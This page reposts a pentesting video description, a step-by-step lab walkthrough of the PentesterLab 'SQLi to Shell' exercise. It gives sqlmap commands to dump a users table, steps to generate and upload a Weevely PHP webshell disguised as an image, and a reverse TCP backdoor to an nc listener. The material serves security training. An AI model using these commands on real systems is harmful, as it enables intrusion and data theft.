Поделитесь видео 🙏

Web App Pentesting- SQL Injection & Php Backdoor

Name: Web App Pentesting- SQL Injection & Php Backdoor смотреть онлайн
Uploaded: 2023-11-30T02:50:40+03:00
Description: Identify SQL injection vulnerabilities, enumerate MySQL database with sqlmap, upload weevley php backdoor, create reverse tcp shell PentesterLab Sqli2Shell iso

PHP Бэкэнд

• 📁 Лайфстайл • 👁️ 26 • 📅 30.11.2023

Identify SQL injection vulnerabilities, enumerate MySQL database with sqlmap, upload weevley php backdoor, create reverse tcp shell

PentesterLab Sqli2Shell iso & course details:
https://pentesterlab.com/exercises/from_sqli_to_shell

Kali 2 iso:
https://www.kali.org/downloads/

Boot these virtual machines using your hyper-visor of choice.

SQLi to Shell
Detect SQLi vulnerabilities w/ ' (single quote)

Use sqlmap to access database information

sqlmap -u http://target_ip/cat/php?id=3-1 --dbs
sqlmap -u http://target_ip/cat/php?id=3-1 -D photoblog --tables
sqlmap -u http://target_ip/cat/php?id=3-1 -D photoblog -T users --columns
sqlmap -u http://target_id/cat/php?id=3-1 -D photoblog -T users -C id,login,password --dump

Crack password hash with john/cain/sqlmap/etc.
We have admin access!

Create and upload Weevely php webshell

git clone https://github.com/Anorov/PySocks.git
cd Pysocks.git
python setup.py install
cd ..
git clone https://github.com/epinna/weevely3.git
cd weevely
python Weevely.py generate hacked /root/Desktop/web.php.jpx

Upload web.php.jpx to file system

python Weevely.py http://target_ip/admin/uploads/web.php.jpx hacked
We've accessed the file system remotely!

Exfil data:
:file_download /var/www/admin/uploads/hacker.png /root/Desktop/hacker.png

Create TCP reverse backdoor
Nc -l -p 5412 (on kali)
:backdoor_reversetcp kali_ip 5412

Access to shell!

Что делает видео по-настоящему запоминающимся? Наверное, та самая атмосфера, которая заставляет забыть о времени. Когда вы заходите на RUVIDEO, чтобы посмотреть онлайн «Web App Pentesting- SQL Injection & Php Backdoor», вы рассчитываете на нечто большее, чем просто загрузку плеера. И мы это понимаем. Контент такого уровня заслуживает того, чтобы его смотрели в HD 1080, без дрожания картинки и бесконечного буферизации.

Честно говоря, Rutube сегодня — это кладезь уникальных находок, которые часто теряются в общем шуме. Мы же вытаскиваем на поверхность самое интересное. Будь то динамичный экшн, глубокий разбор темы от любимого автора или просто уютное видео для настроения — всё это доступно здесь бесплатно и без лишних формальностей. Никаких «заполните анкету, чтобы продолжить». Только вы, ваш экран и качественный поток.

Если вас зацепило это видео, не забудьте взглянуть на похожие материалы в блоке справа. Мы откалибровали наши алгоритмы так, чтобы они подбирали контент не просто «по тегам», а по настроению и смыслу. Ведь в конечном итоге, онлайн-кинотеатр — это не склад файлов, а место, где каждый вечер можно найти свою историю. Приятного вам отдыха на RUVIDEO!

Видео взято из открытых источников Rutube. Если вы правообладатель, обратитесь к первоисточнику.